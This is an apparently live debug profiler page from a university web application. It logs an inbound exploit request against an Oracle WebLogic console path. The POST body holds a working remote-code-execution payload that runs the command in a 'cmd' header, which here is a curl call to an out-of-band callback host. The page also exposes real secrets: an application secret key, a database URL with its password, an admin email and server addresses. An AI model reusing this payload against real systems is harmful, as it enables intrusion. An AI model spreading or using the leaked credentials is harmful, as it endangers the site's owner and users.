ErrorController
Request
GET Parameters
No GET parameters
POST Parameters
| Key | Value |
|---|---|
| _nfpb | "true" |
| _pageLabel | "" |
| handle | """ com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\r\n weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\r\n java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");\r\n field.setAccessible(true);\r\n Object obj = field.get(adapter);\r\n weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);\r\n String cmd = req.getHeader("cmd");\r\n String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};\r\n if (cmd != null) {\r\n String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();\r\n weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);\r\n res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));\r\n res.getServletOutputStream().flush();\r\n res.getWriter().write("");\r\n }executeThread.interrupt();\r\n "); """ |
Uploaded Files
No files were uploaded
Request Attributes
Request Headers
| Header | Value |
|---|---|
| accept | "*/*" |
| accept-encoding | "gzip" |
| cmd | "curl d7j26ni02pldie1ecu40nee959sbdtbex.oast.site" |
| connection | "close" |
| content-length | "1258" |
| content-type | "application/x-www-form-urlencoded" |
| host | "rad-sdsc.ucsd.edu" |
| user-agent | "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" |
| x-php-ob-level | "1" |
Request Content
Raw
_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();
weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();
java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");
field.setAccessible(true);
Object obj = field.get(adapter);
weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj);
String cmd = req.getHeader("cmd");
String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};
if (cmd != null) {
String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();
weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);
res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));
res.getServletOutputStream().flush();
res.getWriter().write("");
}executeThread.interrupt();
");
Response
Response Headers
| Header | Value |
|---|---|
| cache-control | "no-cache, private" |
| content-type | "text/html; charset=UTF-8" |
| date | "Thu, 23 Apr 2026 23:24:48 GMT" |
| x-debug-exception | "No%20route%20found%20for%20%22POST%20https%3A%2F%2Frad-sdsc.ucsd.edu%2Fconsole%2Fcss%2F%25252e%25252e%25252fconsole.portal%22" |
| x-debug-exception-file | "%2Fvar%2Fwww%2Fwebapps%2FFellowshipApplication%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135" |
| x-debug-token | "4153e8" |
Cookies
Request Cookies
No request cookies
Response Cookies
No response cookies
Session
Session Metadata
No session metadata
Session Attributes
No session attributes
Session Usage
0
Usages
Stateless check enabled
Session not used.
Flashes
Flashes
No flash messages were created.
Server Parameters
Server Parameters
Defined in .env
| Key | Value |
|---|---|
| APP_ENV | "dev" |
| APP_SECRET | "0da11a0b64b06231a4c8bc059d84af49" |
| DATABASE_URL | "postgresql://radfluro:myradpw0!@127.0.0.1:5432/fellowapp28?serverVersion=13&charset=utf8" |
Defined as regular env variables
| Key | Value |
|---|---|
| APP_DEBUG | "1" |
| CONTENT_LENGTH | "1258" |
| CONTENT_TYPE | "application/x-www-form-urlencoded" |
| CONTEXT_DOCUMENT_ROOT | "/var/www/webapps/FellowshipApplication/public" |
| CONTEXT_PREFIX | "" |
| DOCUMENT_ROOT | "/var/www/webapps/FellowshipApplication/public" |
| GATEWAY_INTERFACE | "CGI/1.1" |
| HTTPS | "on" |
| HTTP_ACCEPT | "*/*" |
| HTTP_ACCEPT_ENCODING | "gzip" |
| HTTP_CMD | "curl d7j26ni02pldie1ecu40nee959sbdtbex.oast.site" |
| HTTP_CONNECTION | "close" |
| HTTP_HOST | "rad-sdsc.ucsd.edu" |
| HTTP_USER_AGENT | "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36" |
| PATH | "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin" |
| PHP_SELF | "/index.php" |
| QUERY_STRING | "" |
| REMOTE_ADDR | "38.134.148.170" |
| REMOTE_PORT | "49876" |
| REQUEST_METHOD | "GET" |
| REQUEST_SCHEME | "https" |
| REQUEST_TIME | 1776986688 |
| REQUEST_TIME_FLOAT | 1776986688.884 |
| REQUEST_URI | "/console/css/%252e%252e%252fconsole.portal" |
| SCRIPT_FILENAME | "/var/www/webapps/FellowshipApplication/public/index.php" |
| SCRIPT_NAME | "/index.php" |
| SERVER_ADDR | "132.249.119.111" |
| SERVER_ADMIN | "eghobrial@ucsd.edu" |
| SERVER_NAME | "rad-sdsc.ucsd.edu" |
| SERVER_PORT | "443" |
| SERVER_PROTOCOL | "HTTP/1.1" |
| SERVER_SIGNATURE | "" |
| SERVER_SOFTWARE | "Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33" |
| SSL_TLS_SNI | "rad-sdsc.ucsd.edu" |
| SYMFONY_DOTENV_VARS | "APP_ENV,APP_SECRET,DATABASE_URL" |
| UNIQUE_ID | "aeqqQOXErguBUMmZBr3MBgAAAAE" |
Parent Request
Return to parent request (token = 2ef46c)
| Key | Value |
|---|---|
| _remove_csp_headers | true |
| _stopwatch_token | "bedfde" |